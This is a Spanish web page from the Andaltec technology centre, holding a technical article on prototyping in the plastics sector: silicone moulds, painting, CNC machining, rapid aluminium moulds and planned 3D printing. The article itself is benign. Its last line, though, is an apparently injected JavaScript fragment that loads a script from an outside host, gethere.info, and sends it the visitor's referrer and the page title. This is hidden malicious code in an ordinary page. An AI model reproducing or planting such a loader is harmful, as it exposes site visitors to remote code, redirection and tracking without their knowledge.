Andaltec
Copyright Andaltec
Artículo Técnico: Avances en el prototipado en el sector del plástico | Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
23770
post-template-default,single,single-post,postid-23770,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.0.2,vc_responsive
 

Artículo Técnico: Avances en el prototipado en el sector del plástico

Artículo Técnico: Avances en el prototipado en el sector del plástico

Rocío Luque

Departamento de Prototipos de  Andaltec

Rocio Luque

El avance tecnológico a lo largo de los años ha permitido que las ideas se transformen en realidad, y que podamos realizar modelos sin necesidad de largas esperas  y a precios muy atractivos.  Andaltec  cuenta con la tecnología necesaria para fabricar piezas con una gran precisión dimensional, detalles finos, superficies lisas y acabados a gusto del consumidor.

Los moldes de silicona son realmente versátiles y permiten reproducir desde piezas sencillas hasta las más complejas. Con un solo molde pueden realizarse pre series de 20-25 piezas en un amplio abanico de resinas técnicas, que imitan prácticamente cualquier termoplástico industrial  desde ABS, PP, PA, PC, etc.  Las piezas obtenidas por esta tecnología van a permitir ventajas como realizar ensayos con materiales que simulen al material final (validación de propiedades mecánicas, térmicas o estáticas), piezas transparentes y piezas elastómeras con diferentes durezas. Permite realizar piezas sobremoldeadas, material rígido y elastómero y  piezas con insertos metálicos. Asimismo, estos prototipos pueden resultar muy valiosos para testar el mercado antes de la fabricación en serie, así como series cortas para su  comercialización.

Entre los sectores de aplicación podemos mencionar el  del automóvil, electrodomésticos,  iluminación, embalajes, medicina, industrial,  aeronáutica, así como elementos ornamentales y/o  de restauración.

Andaltec cuenta con unas modernas instalaciones  provistas de una cabina de pintura, donde es posible definir un acabado al prototipo que le aporte un estilo innovador, adaptarlos a los colores corporativos o hacer distintos texturizados y granitados en función de las necesidades del diseño.  De esta manera se pueden obtener prototipos cercanos a los productos acabados con una gran calidad y un plazo de entrega muy competitivo.

Andaltec ofrece a sus clientes una amplia gama de opciones en mecanizado CNC siendo para determinadas piezas o geometrías  la solución más rápida y económica. Se pueden obtener piezas en una gran variedad de materiales como aluminio, acero, ABS, PC, PMMA, PA, Celotex, POM, etc. Contamos con dos centros de mecanizado de alta velocidad equipados con tres y cinco ejes,  para dar una  respuesta rápida  a la creciente demanda  obteniendo modelos de alta precisión y gran calidad. Podemos realizar desde un solo componente hasta una serie corta de piezas mecanizadas.

Para grandes series de no más de 10000 unidades contamos con el equipamiento necesario para el diseño, desarrollo y fabricación de  moldes rápidos de aluminio y su posterior inyección dentro de nuestras instalaciones.

Próximamente Andaltec contará con nuevos equipamientos de prototipado con diferentes tecnologías de impresión 3D, las cuales darán respuesta a prácticamente a todas las necesidades de nuestros clientes a partir de sus datos CAD. Se podrán obtener prototipos con gran precisión, resolución y calidad superficial, multimateriales, con diferente rigidez y elasticidad, transparentes, con gran funcionalidad y gran variedad de materiales técnicos.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;